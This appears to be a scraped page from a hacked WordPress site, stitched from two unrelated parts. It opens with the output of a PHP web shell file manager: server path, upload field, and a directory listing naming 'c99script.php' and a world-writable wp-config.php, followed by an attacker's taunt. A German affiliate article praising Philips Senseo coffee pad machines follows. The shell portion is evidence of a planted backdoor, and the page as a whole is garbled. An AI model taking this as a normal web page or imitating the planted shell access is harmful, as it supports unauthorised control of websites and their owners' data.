MINI MINI MANI MO

Path : /var/customers/webs/P0110/
File Upload :

Name
Size
Permission
Modify
test
--
drwxr-xr-x
webalizer
--
drwxr-xr-x
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
0.474 KB
-rw-r--r--
c99script.php
32.019 KB
-rw-r--r--
googlef0e9d3a4f7394a4a.html
0.052 KB
-rw-r--r--
index.php
32.3 KB
-rw-r--r--
license.txt
19.468 KB
-rw-r--r--
liesmich.html
8.538 KB
-rw-r--r--
new_readme.php
7.017 KB
-rw-r--r--
readme.html
7.195 KB
-rw-r--r--
robots.txt
0.343 KB
-rw-r--r--
wp-activate.php
6.776 KB
-rw-r--r--
wp-blog-header.php
0.36 KB
-rw-r--r--
wp-comments-post.php
2.229 KB
-rw-r--r--
wp-config-sample.php
3.579 KB
-rw-r--r--
wp-config.php
4.205 KB
-rw-rw-rw-
wp-cron.php
3.862 KB
-rw-r--r--
wp-links-opml.php
2.445 KB
-rw-r--r--
wp-load.php
3.248 KB
-rw-r--r--
wp-login.php
46.481 KB
-rw-r--r--
wp-mail.php
8.284 KB
-rw-r--r--
wp-settings.php
18.672 KB
-rw-r--r--
wp-signup.php
30.383 KB
-rw-r--r--
wp-trackback.php
4.652 KB
-rw-r--r--
xmlrpc.php
3.076 KB
-rw-r--r--

OHA YOOOO
Philips Kaffeepadmaschinen » Kaffeepadmaschine.info

Philips Kaffeepadmaschinen

Kaffeepadmaschine Philips Senseo 7810/60Wenn man von einer Kaffeepadmaschine spricht, meint man in aller Regel eine Philips Senseo.
Im Jahre 2001 brachte der niederländische Elektronikkonzern in Kooperation mit dem ebenfalls niederländischen Kaffeeröster Douwe Egberts die erste Portionsmaschine für Kaffeepads heraus, von der bis dato über 33 Millionen Stück verkauft wurden.
Dass die Philips Kaffeepadmaschine so bekannt ist, liegt nicht zuletzt daran, dass die ersten 5 Jahre nach Vorstellung der Senseo es aufgrund des Patents keine Mitkonkurrenten gab.
Erst ab dem Jahre 2007 konnten weitere Mitbewerber Kaffeepadmaschinen herstellen und vermarkten, von denen sie aber im Vergleich mit Philips nur eine untergeordnete Rolle spielen.
Unter den zehn meistverkauften Padmaschinen bei Amazon ist nur der letzte Platz von einem anderen Hersteller. Unter den ersten 30 sind sogar 27 Maschinen von Philips. Eine Zahl, die wahrlich für sich spricht.

Hier die stets aktuelle Liste der von uns getesteten Philips Kaffeepadmaschinen:

Warum sind Philips Kaffeepadmaschinen so beliebt?

Es fängt wohl damit an, dass Philips Kaffeepadmaschinen für jeden Geschmack und auch für jeden Geldbeutel anbietet. Einsteigermodelle sind bereits für unter € 50,00 zu haben und da alle Senseo Kaffeepadmaschinen nach dem gleichen Prinzip arbeiten, bereiten die preisgünstigeren Maschinen einen genauso wohlschmeckenden, richtig temperierten Kaffee an, der über eine sehr schöne Crema verfügt und sich in nichts von den teureren Modellen unterscheidet, die lediglich über ein andere Design und/oder zusätzliche Features verfügen.
Dazu kommt, dass Philips aus seinen Fehlern lernt und die Kritiken seiner Kunden und objektiven Testern ernst nimmt, wie man am Beispiel der zu kleinen Wassertanks oder des während des Brühvorgangs zu öffnenden Deckels erkennt. Fehler, wie sie in der 1. Generation der Senseo Kaffeepadmaschinen vorkamen.

Die Philips Senseo HD7810/60 ist die meistverkaufte Kaffeepadmaschine

Die Philips Senseo HD7810/60 ist die meistverkaufte Kaffeepadmaschine

Auch Designwünsche, besonders der jüngeren Kundschaft, nimmt der Hersteller durchaus ernst. Gerade die Senseo Twist begeistert Menschen, die vorher niemals über den Kauf einer Kaffeepadmaschine nachgedacht haben. Doch es sind nicht nur poppigen Farben, die für eine Senseo Twist sprechen, denn mit dem etwas separiertem Wassertank lässt sich immer schnell der noch vorhandene Wasservorrat überprüfen, was bei den klassischen Padmaschinen nicht der Fall war und ist.
Das Design ist generell einer der Punkte, warum die Philips Kaffeepadmaschinen so beliebt sind, denn unter den Dutzenden von verschiedenen Geräten findet sich für jeden die passende.
Sei es eine klassische Philips Senseo 7810/60, die es in verschiedenen Farben gibt, die moderne Philips Senseo Twist mit ihrem modernem Aussehen und den poppigen Farben oder zum Beispiel mit der Senseo Kaffeemaschine HD7855/60 – SENSEO LatteDuo, die leckere Kaffeespezialitäten wie Cappuccino oder Latte Macchiato mit dem integriertem Milchaufschäumer zubereitet. Dazu hält diese Kaffeepadmaschine weitere komfortable Extras, wie zum Beispiel eine Entkalkungsanzeige, eine programmierbare Tassengröße oder dem intuitivem Touchpanel bereit, die es noch einfacher und komfortabler machen, einen Kaffee zuzubereiten

Wenig Konkurrenz für Philips Kaffeepadmaschinen

Es gibt zwar Mitbewerber auf dem Markt der Padmaschinen, doch sind diese recht rar gesät. Ob WMF oder Petra, die beiden einzigen Hersteller, die überhaupt als Mitbewerber zählen, keiner von beiden Chancen, dem Marktführer in Sachen Kaffeepadmaschinen ernsthaft Konkurrenz zu bieten.
WMF hatte mit der kleinen WMF 1 Kaffeepadmaschine zwar ein echtes Highlight, und dies in doppelter Hinsicht, auf dem Markt etabliert, doch konnte sie sich genauso wenig durchsetzen, wie die durchaus ansprechenden und qualitativ hochwertigen WMF Lono. Doch seitdem hat sich nichts mehr getan.
Ein möglicher Grund ist womöglich, dass nach dem Verkauf des Tochter-Unternehmens Petra, der durchaus eine Rolle bei den Haushalts-Kleingeräten spielt, die Entwicklung und Chancen dem Württemberger Unternehmen als unrentabel erschien.
Petra, die aktuell vier verschiedene Kaffeepadmaschinen anbieten, probieren weiterhin sich auf dem Markt zu behaupten. Unter anderem bieten sie aktuell mit dem Kaffee-Pad-Automat KM 42.17 eine Maschine, die nicht nur einen Milchaufschäumer integriert hat, sondern auch die Möglichkeit bietet Ihr Heißgetränk mit gemahlenem Kaffee und ohne Pads.
Leider lassen sich bei den Kaffeepadmaschinen von diesem Hersteller (genau wie bei WMF) keine Senseo Cappuccino und Chocobreaks zuzubereiten. Auch die Kundenbewertungen sind im Gegensatz zu den Philips Kaffeepadmaschinen nicht ganz so positiv.

Philips Kaffeepadmaschinen haben uns am meisten überzeugt

Auch wenn wir nicht immer 100 % zufrieden waren und manche Dinge, auch Preise, bei den Philips Kaffeepadmaschinen nur schwer nachvollziehen konnten, so wussten sie doch am ehesten zu überzeugen.
Ob in Punkto Produktauswahl, Kaffeequalität oder Verarbeitung, bei keiner der entscheidenden Punkte konnte einer der Mitbewerber ernsthaft am Image der Niederländer kratzen.
Zudem kann man auch von Philips am ehesten mit Innovationen und Produktverbesserungen rechnen, wie die Vergangenheit bewies, so dass wir hier ausdrücklich die Philips Kaffeepadmaschinen empfehlen